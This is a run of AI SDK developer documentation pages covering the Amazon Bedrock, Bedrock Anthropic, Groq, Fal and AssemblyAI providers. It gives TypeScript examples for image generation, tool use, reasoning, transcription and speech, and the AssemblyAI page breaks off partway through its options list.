Image Models

You can create models that call the Bedrock API Bedrock API using the .image() factory method.

For more on the Amazon Nova Canvas image model, see the Nova Canvas Overview.

const model = bedrock.image('amazon.nova-canvas-v1:0');

You can then generate images with the experimental_generateImage function:

import { bedrock } from '@ai-sdk/amazon-bedrock';
import { experimental_generateImage as generateImage } from 'ai';

const { image } = await generateImage({
  model: bedrock.image('amazon.nova-canvas-v1:0'),
  prompt: 'A beautiful sunset over a calm ocean',
  size: '512x512',
  seed: 42,
});

You can also pass the providerOptions object to the generateImage function to customize the generation behavior:

import { bedrock } from '@ai-sdk/amazon-bedrock';
import { experimental_generateImage as generateImage } from 'ai';

const { image } = await generateImage({
  model: bedrock.image('amazon.nova-canvas-v1:0'),
  prompt: 'A beautiful sunset over a calm ocean',
  size: '512x512',
  seed: 42,
  providerOptions: {
    bedrock: {
      quality: 'premium',
      negativeText: 'blurry, low quality',
      cfgScale: 7.5,
      style: 'PHOTOREALISM',
    },
  },
});

The following optional provider options are available for Amazon Nova Canvas:

quality string

The quality level for image generation. Accepts 'standard' or 'premium'.
negativeText string

Text describing what you don't want in the generated image.
cfgScale number

Controls how closely the generated image adheres to the prompt. Higher values result in images that are more closely aligned to the prompt.
style string

Predefined visual style for image generation.
Accepts one of: 3D_ANIMATED_FAMILY_FILM · DESIGN_SKETCH · FLAT_VECTOR_ILLUSTRATION ·
GRAPHIC_NOVEL_ILLUSTRATION · MAXIMALISM · MIDCENTURY_RETRO ·
PHOTOREALISM · SOFT_DIGITAL_PAINTING.

Documentation for additional settings can be found within the Amazon Bedrock User Guide for Amazon Nova Documentation.

Image Model Settings

You can customize the generation behavior with optional options:

await generateImage({
  model: bedrock.image('amazon.nova-canvas-v1:0'),
  prompt: 'A beautiful sunset over a calm ocean',
  size: '512x512',
  seed: 42,
  maxImagesPerCall: 1, // Maximum number of images to generate per API call
});

maxImagesPerCall number

Override the maximum number of images generated per API call. Default can vary by model, with 5 as a common default.

Model Capabilities

The Amazon Nova Canvas model supports custom sizes with constraints as follows:

Each side must be between 320-4096 pixels, inclusive.
Each side must be evenly divisible by 16.
The aspect ratio must be between 1:4 and 4:1. That is, one side can't be more than 4 times longer than the other side.
The total pixel count must be less than 4,194,304.

For more, see Image generation access and usage.

Model	Sizes
`amazon.nova-canvas-v1:0`	Custom sizes: 320-4096px per side (must be divisible by 16), aspect ratio 1:4 to 4:1, max 4.2M pixels

Response Headers

The Amazon Bedrock provider will return the response headers associated with network requests made of the Bedrock servers.

import { bedrock } from '@ai-sdk/amazon-bedrock';
import { generateText } from 'ai';

const { text } = await generateText({
  model: bedrock('meta.llama3-70b-instruct-v1:0'),
  prompt: 'Write a vegetarian lasagna recipe for 4 people.',
});

console.log(result.response.headers);

Below is sample output where you can see the x-amzn-requestid header. This can be useful for correlating Bedrock API calls with requests made by the AI SDK:

{
  connection: 'keep-alive',
  'content-length': '2399',
  'content-type': 'application/json',
  date: 'Fri, 07 Feb 2025 04:28:30 GMT',
  'x-amzn-requestid': 'c9f3ace4-dd5d-49e5-9807-39aedfa47c8e'
}

This information is also available with streamText:

import { bedrock } from '@ai-sdk/amazon-bedrock';
import { streamText } from 'ai';

const result = streamText({
  model: bedrock('meta.llama3-70b-instruct-v1:0'),
  prompt: 'Write a vegetarian lasagna recipe for 4 people.',
});
for await (const textPart of result.textStream) {
  process.stdout.write(textPart);
}
console.log('Response headers:', (await result.response).headers);

With sample output as:

{
  connection: 'keep-alive',
  'content-type': 'application/vnd.amazon.eventstream',
  date: 'Fri, 07 Feb 2025 04:33:37 GMT',
  'transfer-encoding': 'chunked',
  'x-amzn-requestid': 'a976e3fc-0e45-4241-9954-b9bdd80ab407'
}

Bedrock Anthropic Provider Usage

The Bedrock Anthropic provider offers support for Anthropic's Claude models through Amazon Bedrock's native InvokeModel API. This provides full feature parity with the Anthropic API, including features that may not be available through the Converse API (such as stop_sequence in streaming responses).

For more information on Claude models available on Amazon Bedrock, see Claude on Amazon Bedrock.

Provider Instance

You can import the default provider instance bedrockAnthropic from @ai-sdk/amazon-bedrock/anthropic:

import { bedrockAnthropic } from '@ai-sdk/amazon-bedrock/anthropic';

If you need a customized setup, you can import createBedrockAnthropic from @ai-sdk/amazon-bedrock/anthropic and create a provider instance with your settings:

import { createBedrockAnthropic } from '@ai-sdk/amazon-bedrock/anthropic';

const bedrockAnthropic = createBedrockAnthropic({
  region: 'us-east-1', // optional
  accessKeyId: 'xxxxxxxxx', // optional
  secretAccessKey: 'xxxxxxxxx', // optional
  sessionToken: 'xxxxxxxxx', // optional
});

Provider Settings

You can use the following optional settings to customize the Bedrock Anthropic provider instance:

region string

The AWS region that you want to use for the API calls. It uses the AWS_REGION environment variable by default.
accessKeyId string

The AWS access key ID that you want to use for the API calls. It uses the AWS_ACCESS_KEY_ID environment variable by default.
secretAccessKey string

The AWS secret access key that you want to use for the API calls. It uses the AWS_SECRET_ACCESS_KEY environment variable by default.
sessionToken string

Optional. The AWS session token that you want to use for the API calls. It uses the AWS_SESSION_TOKEN environment variable by default.
apiKey string

API key for authenticating requests using Bearer token authentication. When provided, this will be used instead of AWS SigV4 authentication. It uses the AWS_BEARER_TOKEN_BEDROCK environment variable by default.
baseURL string

Base URL for the Bedrock API calls. Useful for custom endpoints or proxy configurations.
headers Resolvable<Record<string, string | undefined>>

Headers to include in the requests.
fetch (input: RequestInfo, init?: RequestInit) => Promise<Response>

Custom fetch implementation. You can use it as a middleware to intercept requests, or to provide a custom fetch implementation for e.g. testing.
credentialProvider () => PromiseLike<BedrockCredentials>

The AWS credential provider to use for the Bedrock provider to get dynamic credentials similar to the AWS SDK. Setting a provider here will cause its credential values to be used instead of the accessKeyId, secretAccessKey, and sessionToken settings.

Language Models

You can create models that call the Anthropic Messages API using the provider instance. The first argument is the model id, e.g. us.anthropic.claude-3-5-sonnet-20241022-v2:0.

const model = bedrockAnthropic('us.anthropic.claude-3-5-sonnet-20241022-v2:0');

You can use Bedrock Anthropic language models to generate text with the generateText function:

import { bedrockAnthropic } from '@ai-sdk/amazon-bedrock/anthropic';
import { generateText } from 'ai';

const { text } = await generateText({
  model: bedrockAnthropic('us.anthropic.claude-3-5-sonnet-20241022-v2:0'),
  prompt: 'Write a vegetarian lasagna recipe for 4 people.',
});

Provider Options

The following optional provider options are available for Bedrock Anthropic models:

metadata object

Optional. Metadata to include with the request. See the Anthropic API documentation for details.
- userId string - An external identifier for the end-user.

Cache Control

import { bedrockAnthropic } from '@ai-sdk/amazon-bedrock/anthropic';
import { generateText } from 'ai';

const result = await generateText({
  model: bedrockAnthropic('us.anthropic.claude-3-7-sonnet-20250219-v1:0'),
  messages: [
    {
      role: 'system',
      content: 'You are an expert assistant.',
      providerOptions: {
        anthropic: { cacheControl: { type: 'ephemeral' } },
      },
    },
    {
      role: 'user',
      content: 'Explain quantum computing.',
    },
  ],
});

Computer Use

The Bedrock Anthropic provider supports Anthropic's computer use tools:

Bash Tool: Allows running bash commands.
Text Editor Tool: Provides functionality for viewing and editing text files.
Computer Tool: Enables control of keyboard and mouse actions on a computer.

They are available via the tools property of the provider instance.

Bash Tool

import { bedrockAnthropic } from '@ai-sdk/amazon-bedrock/anthropic';
import { generateText, stepCountIs } from 'ai';

const result = await generateText({
  model: bedrockAnthropic('us.anthropic.claude-3-7-sonnet-20250219-v1:0'),
  tools: {
    bash: bedrockAnthropic.tools.bash_20241022({
      execute: async ({ command }) => {
        // Implement your bash command execution logic here
        return [{ type: 'text', text: `Executed: ${command}` }];
      },
    }),
  },
  prompt: 'List the files in my directory.',
  stopWhen: stepCountIs(2),
});

Text Editor Tool

import { bedrockAnthropic } from '@ai-sdk/amazon-bedrock/anthropic';
import { generateText, stepCountIs } from 'ai';

const result = await generateText({
  model: bedrockAnthropic('us.anthropic.claude-3-7-sonnet-20250219-v1:0'),
  tools: {
    str_replace_editor: bedrockAnthropic.tools.textEditor_20241022({
      execute: async ({ command, path, old_str, new_str }) => {
        // Implement your text editing logic here
        return 'File updated successfully';
      },
    }),
  },
  prompt: 'Update my README file.',
  stopWhen: stepCountIs(5),
});

Computer Tool

import { bedrockAnthropic } from '@ai-sdk/amazon-bedrock/anthropic';
import { generateText, stepCountIs } from 'ai';
import fs from 'fs';

const result = await generateText({
  model: bedrockAnthropic('us.anthropic.claude-3-7-sonnet-20250219-v1:0'),
  tools: {
    computer: bedrockAnthropic.tools.computer_20241022({
      displayWidthPx: 1024,
      displayHeightPx: 768,
      execute: async ({ action, coordinate, text }) => {
        if (action === 'screenshot') {
          return {
            type: 'image',
            data: fs.readFileSync('./screenshot.png').toString('base64'),
          };
        }
        return `executed ${action}`;
      },
      toModelOutput({ output }) {
        return {
          type: 'content',
          value: [
            typeof output === 'string'
              ? { type: 'text', text: output }
              : {
                  type: 'image-data',
                  data: output.data,
                  mediaType: 'image/png',
                },
          ],
        };
      },
    }),
  },
  prompt: 'Take a screenshot.',
  stopWhen: stepCountIs(3),
});

Reasoning

Anthropic has reasoning support for Claude 3.7 and Claude 4 models on Bedrock, including:

us.anthropic.claude-opus-4-7
us.anthropic.claude-opus-4-6-v1
us.anthropic.claude-opus-4-5-20251101-v1:0
us.anthropic.claude-sonnet-4-5-20250929-v1:0
us.anthropic.claude-opus-4-20250514-v1:0
us.anthropic.claude-sonnet-4-20250514-v1:0
us.anthropic.claude-opus-4-1-20250805-v1:0
us.anthropic.claude-haiku-4-5-20251001-v1:0
us.anthropic.claude-3-7-sonnet-20250219-v1:0

You can enable it using the thinking provider option and specifying a thinking budget in tokens.

import { bedrockAnthropic } from '@ai-sdk/amazon-bedrock/anthropic';
import { generateText } from 'ai';

const { text, reasoningText, reasoning } = await generateText({
  model: bedrockAnthropic('us.anthropic.claude-sonnet-4-5-20250929-v1:0'),
  prompt: 'How many people will live in the world in 2040?',
  providerOptions: {
    anthropic: {
      thinking: { type: 'enabled', budgetTokens: 12000 },
    },
  },
});

console.log(reasoningText); // reasoning text
console.log(reasoning); // reasoning details including redacted reasoning
console.log(text); // text response

See AI SDK UI: Chatbot for more details on how to integrate reasoning into your chatbot.

Model Capabilities

Model	Image Input	Object Generation	Tool Usage	Computer Use	Reasoning
`us.anthropic.claude-opus-4-7`
`us.anthropic.claude-opus-4-6-v1`
`us.anthropic.claude-opus-4-5-20251101-v1:0`
`us.anthropic.claude-sonnet-4-5-20250929-v1:0`
`us.anthropic.claude-opus-4-20250514-v1:0`
`us.anthropic.claude-sonnet-4-20250514-v1:0`
`us.anthropic.claude-opus-4-1-20250805-v1:0`
`us.anthropic.claude-haiku-4-5-20251001-v1:0`
`us.anthropic.claude-3-7-sonnet-20250219-v1:0`
`us.anthropic.claude-3-5-sonnet-20241022-v2:0`
`us.anthropic.claude-3-5-haiku-20241022-v1:0`

Migrating to `@ai-sdk/amazon-bedrock` 2.x

The Amazon Bedrock provider was rewritten in version 2.x to remove the dependency on the @aws-sdk/client-bedrock-runtime package.

title: Groq description: Learn how to use Groq.

Groq Provider

The Groq provider contains language model support for the Groq API.

Setup

The Groq provider is available via the @ai-sdk/groq module. You can install it with

Provider Instance

You can import the default provider instance groq from @ai-sdk/groq:

import { groq } from '@ai-sdk/groq';

If you need a customized setup, you can import createGroq from @ai-sdk/groq and create a provider instance with your settings:

import { createGroq } from '@ai-sdk/groq';

const groq = createGroq({
  // custom settings
});

You can use the following optional settings to customize the Groq provider instance:

baseURL string

Use a different URL prefix for API calls, e.g. to use proxy servers. The default prefix is https://api.groq.com/openai/v1.
apiKey string

API key that is being sent using the Authorization header. It defaults to the GROQ_API_KEY environment variable.
headers Record<string,string>

Custom headers to include in the requests.
fetch (input: RequestInfo, init?: RequestInit) => Promise<Response>

Custom fetch implementation. Defaults to the global fetch function. You can use it as a middleware to intercept requests, or to provide a custom fetch implementation for e.g. testing.

Language Models

You can create Groq models using a provider instance. The first argument is the model id, e.g. gemma2-9b-it.

const model = groq('gemma2-9b-it');

Reasoning Models

import { groq } from '@ai-sdk/groq';
import { generateText } from 'ai';

const result = await generateText({
  model: groq('qwen/qwen3-32b'),
  providerOptions: {
    groq: {
      reasoningFormat: 'parsed',
      reasoningEffort: 'default',
      parallelToolCalls: true, // Enable parallel function calling (default: true)
      user: 'user-123', // Unique identifier for end-user (optional)
      serviceTier: 'flex', // Use flex tier for higher throughput (optional)
    },
  },
  prompt: 'How many "r"s are in the word "strawberry"?',
});

The following optional provider options are available for Groq language models:

reasoningFormat 'parsed' | 'raw' | 'hidden'

Controls how reasoning is exposed in the generated text. Only supported by reasoning models like qwen-qwq-32b and deepseek-r1-distill-* models.

For a complete list of reasoning models and their capabilities, see Groq's reasoning models documentation.
reasoningEffort 'low' | 'meduim' | 'high' | 'none' | 'default'

Controls the level of effort the model will put into reasoning.
- qwen/qwen3-32b
  - Supported values:
    - none: Disable reasoning. The model will not use any reasoning tokens.
    - default: Enable reasoning.
- gpt-oss20b/gpt-oss120b
  - Supported values:
    - low: Use a low level of reasoning effort.
    - medium: Use a medium level of reasoning effort.
    - high: Use a high level of reasoning effort.
Defaults to default for qwen/qwen3-32b.
structuredOutputs boolean

Whether to use structured outputs.

Defaults to true.

When enabled, object generation will use the json_schema format instead of json_object format, providing more reliable structured outputs.
parallelToolCalls boolean

Whether to enable parallel function calling during tool use. Defaults to true.
user string

A unique identifier representing your end-user, which can help with monitoring and abuse detection.
serviceTier 'on_demand' | 'flex' | 'auto'

Service tier for the request. Defaults to 'on_demand'.
- 'on_demand': Default tier with consistent performance and fairness
- 'flex': Higher throughput tier (10x rate limits) optimized for workloads that can handle occasional request failures
- 'auto': Uses on_demand rate limits first, then falls back to flex tier if exceeded
For more details about service tiers and their benefits, see Groq's Flex Processing documentation.

Only Groq reasoning models support the reasoningFormat option.

Structured Outputs

Structured outputs are enabled by default for Groq models. You can disable them by setting the structuredOutputs option to false.

import { groq } from '@ai-sdk/groq';
import { generateObject } from 'ai';
import { z } from 'zod';

const result = await generateObject({
  model: groq('moonshotai/kimi-k2-instruct-0905'),
  schema: z.object({
    recipe: z.object({
      name: z.string(),
      ingredients: z.array(z.string()),
      instructions: z.array(z.string()),
    }),
  }),
  prompt: 'Generate a simple pasta recipe.',
});

console.log(JSON.stringify(result.object, null, 2));

You can disable structured outputs for models that don't support them:

import { groq } from '@ai-sdk/groq';
import { generateObject } from 'ai';
import { z } from 'zod';

const result = await generateObject({
  model: groq('gemma2-9b-it'),
  providerOptions: {
    groq: {
      structuredOutputs: false,
    },
  },
  schema: z.object({
    recipe: z.object({
      name: z.string(),
      ingredients: z.array(z.string()),
      instructions: z.array(z.string()),
    }),
  }),
  prompt: 'Generate a simple pasta recipe in JSON format.',
});

console.log(JSON.stringify(result.object, null, 2));

Example

You can use Groq language models to generate text with the generateText function:

import { groq } from '@ai-sdk/groq';
import { generateText } from 'ai';

const { text } = await generateText({
  model: groq('gemma2-9b-it'),
  prompt: 'Write a vegetarian lasagna recipe for 4 people.',
});

Image Input

Groq's multi-modal models like meta-llama/llama-4-scout-17b-16e-instruct support image inputs. You can include images in your messages using either URLs or base64-encoded data:

import { groq } from '@ai-sdk/groq';
import { generateText } from 'ai';

const { text } = await generateText({
  model: groq('meta-llama/llama-4-scout-17b-16e-instruct'),
  messages: [
    {
      role: 'user',
      content: [
        { type: 'text', text: 'What do you see in this image?' },
        {
          type: 'image',
          image: 'https://example.com/image.jpg',
        },
      ],
    },
  ],
});

You can also use base64-encoded images:

import { groq } from '@ai-sdk/groq';
import { generateText } from 'ai';
import { readFileSync } from 'fs';

const imageData = readFileSync('path/to/image.jpg', 'base64');

const { text } = await generateText({
  model: groq('meta-llama/llama-4-scout-17b-16e-instruct'),
  messages: [
    {
      role: 'user',
      content: [
        { type: 'text', text: 'Describe this image in detail.' },
        {
          type: 'image',
          image: `data:image/jpeg;base64,${imageData}`,
        },
      ],
    },
  ],
});

Model Capabilities

Model	Image Input	Object Generation	Tool Usage	Tool Streaming
`gemma2-9b-it`
`llama-3.1-8b-instant`
`llama-3.3-70b-versatile`
`meta-llama/llama-guard-4-12b`
`deepseek-r1-distill-llama-70b`
`meta-llama/llama-4-maverick-17b-128e-instruct`
`meta-llama/llama-4-scout-17b-16e-instruct`
`meta-llama/llama-prompt-guard-2-22m`
`meta-llama/llama-prompt-guard-2-86m`
`moonshotai/kimi-k2-instruct-0905`
`qwen/qwen3-32b`
`llama-guard-3-8b`
`llama3-70b-8192`
`llama3-8b-8192`
`mixtral-8x7b-32768`
`qwen-qwq-32b`
`qwen-2.5-32b`
`deepseek-r1-distill-qwen-32b`
`openai/gpt-oss-20b`
`openai/gpt-oss-120b`

Browser Search Tool

Groq provides a browser search tool that offers interactive web browsing capabilities. Unlike traditional web search, browser search navigates websites interactively, providing more detailed and comprehensive results.

Supported Models

Browser search is only available for these specific models:

openai/gpt-oss-20b
openai/gpt-oss-120b

Basic Usage

import { groq } from '@ai-sdk/groq';
import { generateText } from 'ai';

const result = await generateText({
  model: groq('openai/gpt-oss-120b'), // Must use supported model
  prompt:
    'What are the latest developments in AI? Please search for recent news.',
  tools: {
    browser_search: groq.tools.browserSearch({}),
  },
  toolChoice: 'required', // Ensure the tool is used
});

console.log(result.text);

Streaming Example

import { groq } from '@ai-sdk/groq';
import { streamText } from 'ai';

const result = streamText({
  model: groq('openai/gpt-oss-120b'),
  prompt: 'Search for the latest tech news and summarize it.',
  tools: {
    browser_search: groq.tools.browserSearch({}),
  },
  toolChoice: 'required',
});

for await (const delta of result.fullStream) {
  if (delta.type === 'text-delta') {
    process.stdout.write(delta.text);
  }
}

Key Features

Interactive Browsing: Navigates websites like a human user
Comprehensive Results: More detailed than traditional search snippets
Server-side Execution: Runs on Groq's infrastructure, no setup required
Powered by Exa: Uses Exa search engine for optimal results
Currently Free: Available at no additional charge during beta

Best Practices

Use toolChoice: 'required' to ensure the browser search is activated
Only supported on openai/gpt-oss-20b and openai/gpt-oss-120b models
The tool works automatically - no configuration parameters needed
Server-side execution means no additional API keys or setup required

Model Validation

The provider automatically validates model compatibility:

// ✅ Supported - will work
const result = await generateText({
  model: groq('openai/gpt-oss-120b'),
  tools: { browser_search: groq.tools.browserSearch({}) },
});

// ❌ Unsupported - will show warning and ignore tool
const result = await generateText({
  model: groq('gemma2-9b-it'),
  tools: { browser_search: groq.tools.browserSearch({}) },
});
// Warning: "Browser search is only supported on models: openai/gpt-oss-20b, openai/gpt-oss-120b"

Transcription Models

You can create models that call the Groq transcription API using the .transcription() factory method.

The first argument is the model id e.g. whisper-large-v3.

const model = groq.transcription('whisper-large-v3');

import { experimental_transcribe as transcribe } from 'ai';
import { groq } from '@ai-sdk/groq';
import { readFile } from 'fs/promises';

const result = await transcribe({
  model: groq.transcription('whisper-large-v3'),
  audio: await readFile('audio.mp3'),
  providerOptions: { groq: { language: 'en' } },
});

The following provider options are available:

timestampGranularities string[] The granularity of the timestamps in the transcription. Defaults to ['segment']. Possible values are ['word'], ['segment'], and ['word', 'segment']. Note: There is no additional latency for segment timestamps, but generating word timestamps incurs additional latency.
language string The language of the input audio. Supplying the input language in ISO-639-1 format (e.g. 'en') will improve accuracy and latency. Optional.
prompt string An optional text to guide the model's style or continue a previous audio segment. The prompt should match the audio language. Optional.
temperature number The sampling temperature, between 0 and 1. Higher values like 0.8 will make the output more random, while lower values like 0.2 will make it more focused and deterministic. If set to 0, the model will use log probability to automatically increase the temperature until certain thresholds are hit. Defaults to 0. Optional.

Model Capabilities

Model	Transcription	Duration	Segments	Language
`whisper-large-v3`
`whisper-large-v3-turbo`
`distil-whisper-large-v3-en`

title: Fal description: Learn how to use Fal AI models with the AI SDK.

Fal Provider

Setup

The Fal provider is available via the @ai-sdk/fal module. You can install it with

Provider Instance

You can import the default provider instance fal from @ai-sdk/fal:

import { fal } from '@ai-sdk/fal';

If you need a customized setup, you can import createFal and create a provider instance with your settings:

import { createFal } from '@ai-sdk/fal';

const fal = createFal({
  apiKey: 'your-api-key', // optional, defaults to FAL_API_KEY environment variable, falling back to FAL_KEY
  baseURL: 'custom-url', // optional
  headers: {
    /* custom headers */
  }, // optional
});

You can use the following optional settings to customize the Fal provider instance:

baseURL string

Use a different URL prefix for API calls, e.g. to use proxy servers. The default prefix is https://fal.run.
apiKey string

API key that is being sent using the Authorization header. It defaults to the FAL_API_KEY environment variable, falling back to FAL_KEY.
headers Record<string,string>

Custom headers to include in the requests.
fetch (input: RequestInfo, init?: RequestInit) => Promise<Response>

Custom fetch implementation. You can use it as a middleware to intercept requests, or to provide a custom fetch implementation for e.g. testing.

Image Models

You can create Fal image models using the .image() factory method. For more on image generation with the AI SDK see generateImage().

Basic Usage

import { fal } from '@ai-sdk/fal';
import { experimental_generateImage as generateImage } from 'ai';
import fs from 'fs';

const { image, providerMetadata } = await generateImage({
  model: fal.image('fal-ai/flux/dev'),
  prompt: 'A serene mountain landscape at sunset',
});

const filename = `image-${Date.now()}.png`;
fs.writeFileSync(filename, image.uint8Array);
console.log(`Image saved to ${filename}`);

Fal image models may return additional information for the images and the request.

Here are some examples of properties that may be set for each image

providerMetadata.fal.images[0].nsfw; // boolean, image is not safe for work
providerMetadata.fal.images[0].width; // number, image width
providerMetadata.fal.images[0].height; // number, image height
providerMetadata.fal.images[0].content_type; // string, mime type of the image

Model Capabilities

Fal offers many models optimized for different use cases. Here are a few popular examples. For a full list of models, see the Fal AI Search Page.

Model	Description
`fal-ai/flux/dev`	FLUX.1 [dev] model for high-quality image generation
`fal-ai/flux-pro/kontext`	FLUX.1 Kontext [pro] handles both text and reference images as inputs, enabling targeted edits and complex transformations
`fal-ai/flux-pro/kontext/max`	FLUX.1 Kontext [max] with improved prompt adherence and typography generation
`fal-ai/flux-lora`	Super fast endpoint for FLUX.1 with LoRA support
`fal-ai/ideogram/character`	Generate consistent character appearances across multiple images. Maintain facial features, proportions, and distinctive traits
`fal-ai/qwen-image`	Qwen-Image foundation model with significant advances in complex text rendering and precise image editing
`fal-ai/omnigen-v2`	Unified image generation model for Image Editing, Personalized Image Generation, Virtual Try-On, Multi Person Generation and more
`fal-ai/bytedance/dreamina/v3.1/text-to-image`	Dreamina showcases superior picture effects with improvements in aesthetics, precise and diverse styles, and rich details
`fal-ai/recraft/v3/text-to-image`	SOTA in image generation with vector art and brand style capabilities
`fal-ai/wan/v2.2-a14b/text-to-image`	High-resolution, photorealistic images with fine-grained detail

Fal models support the following aspect ratios:

1:1 (square HD)
16:9 (landscape)
9:16 (portrait)
4:3 (landscape)
3:4 (portrait)
16:10 (1280x800)
10:16 (800x1280)
21:9 (2560x1080)
9:21 (1080x2560)

Key features of Fal models include:

Up to 4x faster inference speeds compared to alternatives
Optimized by the Fal Inference Engine™
Support for real-time infrastructure
Cost-effective scaling with pay-per-use pricing
LoRA training capabilities for model personalization

Modify Image

Transform existing images using text prompts.

// Example: Modify existing image
await generateImage({
  model: fal.image('fal-ai/flux-pro/kontext'),
  prompt: 'Put a donut next to the flour.',
  providerOptions: {
    fal: {
      imageUrl:
        'https://v3.fal.media/files/rabbit/rmgBxhwGYb2d3pl3x9sKf_output.png',
    },
  },
});

Provider Options

Fal image models support flexible provider options through the providerOptions.fal object. You can pass any parameters supported by the specific Fal model's API. Common options include:

imageUrl - Reference image URL for image-to-image generation
strength - Controls how much the output differs from the input image
guidanceScale - Controls adherence to the prompt (range: 1-20)
numInferenceSteps - Number of denoising steps (range: 1-50)
enableSafetyChecker - Enable/disable safety filtering
outputFormat - Output format: 'jpeg' or 'png'
syncMode - Wait for completion before returning response
acceleration - Speed of generation: 'none', 'regular', or 'high'
safetyTolerance - Content safety filtering level (1-6, where 1 is strictest)

Refer to the Fal AI model documentation for model-specific parameters.

Advanced Features

Fal's platform offers several advanced capabilities:

Private Model Inference: Run your own diffusion transformer models with up to 50% faster inference
LoRA Training: Train and personalize models in under 5 minutes
Real-time Infrastructure: Enable new user experiences with fast inference times
Scalable Architecture: Scale to thousands of GPUs when needed

For more details about Fal's capabilities and features, visit the Fal AI documentation.

Transcription Models

You can create models that call the Fal transcription API using the .transcription() factory method.

The first argument is the model id without the fal-ai/ prefix e.g. wizper.

const model = fal.transcription('wizper');

import { experimental_transcribe as transcribe } from 'ai';
import { fal } from '@ai-sdk/fal';
import { readFile } from 'fs/promises';

const result = await transcribe({
  model: fal.transcription('wizper'),
  audio: await readFile('audio.mp3'),
  providerOptions: { fal: { batchSize: 10 } },
});

The following provider options are available:

language string Language of the audio file. If set to null, the language will be automatically detected. Accepts ISO language codes like 'en', 'fr', 'zh', etc. Optional.
diarize boolean Whether to diarize the audio file (identify different speakers). Defaults to true. Optional.
chunkLevel string Level of the chunks to return. Either 'segment' or 'word'. Default value: "segment" Optional.
version string Version of the model to use. All models are Whisper large variants. Default value: "3" Optional.
batchSize number Batch size for processing. Default value: 64 Optional.
numSpeakers number Number of speakers in the audio file. If not provided, the number of speakers will be automatically detected. Optional.

Model Capabilities

Model	Transcription	Duration	Segments	Language
`whisper`
`wizper`

Speech Models

You can create models that call Fal text-to-speech endpoints using the .speech() factory method.

Basic Usage

import { experimental_generateSpeech as generateSpeech } from 'ai';
import { fal } from '@ai-sdk/fal';

const result = await generateSpeech({
  model: fal.speech('fal-ai/minimax/speech-02-hd'),
  text: 'Hello from the AI SDK!',
});

Model Capabilities

Model	Description
`fal-ai/minimax/voice-clone`	Clone a voice from a sample audio and generate speech from text prompts
`fal-ai/minimax/voice-design`	Design a personalized voice from a text description and generate speech from text prompts
`fal-ai/dia-tts/voice-clone`	Clone dialog voices from a sample audio and generate dialogs from text prompts
`fal-ai/minimax/speech-02-hd`	Generate speech from text prompts and different voices
`fal-ai/minimax/speech-02-turbo`	Generate fast speech from text prompts and different voices
`fal-ai/dia-tts`	Directly generates realistic dialogue from transcripts with audio conditioning for emotion control. Produces natural nonverbals like laughter and throat clearing
`resemble-ai/chatterboxhd/text-to-speech`	Generate expressive, natural speech with Resemble AI's Chatterbox. Features unique emotion control, instant voice cloning from short audio, and built-in watermarking

Provider Options

Pass provider-specific options via providerOptions.fal depending on the model:

voice_setting object
- voice_id (string): predefined voice ID
- speed (number): 0.5–2.0
- vol (number): 0–10
- pitch (number): -12–12
- emotion (enum): happy | sad | angry | fearful | disgusted | surprised | neutral
- english_normalization (boolean)
audio_setting object Audio configuration settings specific to the model.
language_boost enum Chinese | Chinese,Yue | English | Arabic | Russian | Spanish | French | Portuguese | German | Turkish | Dutch | Ukrainian | Vietnamese | Indonesian | Japanese | Italian | Korean | Thai | Polish | Romanian | Greek | Czech | Finnish | Hindi | auto
pronunciation_dict object Custom pronunciation dictionary for specific words.

Model-specific parameters (e.g., audio_url, prompt, preview_text, ref_audio_url, ref_text) can be passed directly under providerOptions.fal and will be forwarded to the Fal API.

title: AssemblyAI description: Learn how to use the AssemblyAI provider for the AI SDK.

AssemblyAI Provider

The AssemblyAI provider contains language model support for the AssemblyAI transcription API.

Setup

The AssemblyAI provider is available in the @ai-sdk/assemblyai module. You can install it with

Provider Instance

You can import the default provider instance assemblyai from @ai-sdk/assemblyai:

import { assemblyai } from '@ai-sdk/assemblyai';

If you need a customized setup, you can import createAssemblyAI from @ai-sdk/assemblyai and create a provider instance with your settings:

import { createAssemblyAI } from '@ai-sdk/assemblyai';

const assemblyai = createAssemblyAI({
  // custom settings, e.g.
  fetch: customFetch,
});

You can use the following optional settings to customize the AssemblyAI provider instance:

apiKey string

API key that is being sent using the Authorization header. It defaults to the ASSEMBLYAI_API_KEY environment variable.
headers Record<string,string>

Custom headers to include in the requests.
fetch (input: RequestInfo, init?: RequestInit) => Promise<Response>

Custom fetch implementation. Defaults to the global fetch function. You can use it as a middleware to intercept requests, or to provide a custom fetch implementation for e.g. testing.

Transcription Models

You can create models that call the AssemblyAI transcription API using the .transcription() factory method.

The first argument is the model id e.g. best.

const model = assemblyai.transcription('best');

You can also pass additional provider-specific options using the providerOptions argument. For example, supplying the contentSafety option will enable content safety filtering.

import { experimental_transcribe as transcribe } from 'ai';
import { assemblyai } from '@ai-sdk/assemblyai';
import { readFile } from 'fs/promises';

const result = await transcribe({
  model: assemblyai.transcription('best'),
  audio: await readFile('audio.mp3'),
  providerOptions: { assemblyai: { contentSafety: true } },
});

The following provider options are available:

audioEndAt number

End time of the audio in milliseconds. Optional.
audioStartFrom number

Start time of the audio in milliseconds. Optional.
autoChapters boolean

Whether to automatically generate chapters for the transcription. Optional.
autoHighlights boolean

Whether to automatically generate highlights for the transcription. Optional.
boostParam enum

Boost parameter for the transcription. Allowed values: 'low', 'default', 'high'. Optional.
contentSafety boolean

Whether to enable content safety filtering. Optional.
contentSafetyConfidence number

Confidence threshold for content safety filtering (25-100). Optional.
customSpelling array of objects

Custom spelling rules for the transcription. Each object has from (array of strings) and to (string) properties. Optional.
disfluencies boolean

Whether to include disfluencies (um, uh, etc.) in the transcription. Optional.
entityDetection boolean

Whether to detect entities in the transcription. Optional.
filterProfanity boolean

Whether to filter profanity in the transcription. Optional.
formatText boolean

Whether to format the text in the transcription. Optional.
iabCategories boolean

Whether to include IAB categories in the transcription. Optional.
languageCode string

Language code for the audio. Supports numerous ISO-639-1 and ISO-639-3 language codes. Optional.
languageConfidenceThreshold number

Confidence threshold for language detection. Optional.
languageDetection boolean

Whether to enable language detection. Optional.
multichannel boolean

Whether to process multiple audio channels separately. Optional.
punctuate boolean

Whether to add punctuation to the transcription. Optional.
redactPii boolean

Whether to redact personally identifiable information. Optional.
redactPiiAudio boolean

Whether to redact PII in the audio file. Optional.
redactPiiAudioQuality enum

Quality of the redacted audio file. Allowed values: 'mp3', 'wav'. Optional.
redactPiiPolicies array of enums

Policies for PII redaction, specifying which types of information to redact. Supports numerous types like 'person_name', 'phone_number', etc. Optional.
redactPiiSub enum

Substitution method for redacted PII. Allowed values: 'entity_name', 'hash'. Optional.
sentimentAnalysis boolean

